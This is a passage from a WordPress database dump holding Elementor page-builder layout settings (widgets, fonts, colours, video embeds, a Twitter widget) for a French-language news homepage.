bile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Guin\\u00e9e innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false}]'),(1479,503,'_elementor_version','0.4'),(1480,503,'_elementor_css','a:3:{s:4:\"time\";i:1508924649;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1482,504,'_elementor_edit_mode','builder'),(1483,504,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"p72uffi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"orderby\":\"name\",\"loop_infinite_class\":\"loop-infinte-list-2\",\"width\":\"700\",\"height\":\"500\",\"title_font_size\":{\"unit\":\"px\",\"size\":19},\"use_meta\":\"\",\"use_excerpt\":\"\",\"use_button\":\"\",\"content_half_mobile\":{\"unit\":\"px\",\"size\":270},\"content_half_2_mobile\":{\"unit\":\"px\",\"size\":300}},\"elements\":[],\"widgetType\":\"magzma-post-list-2\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos 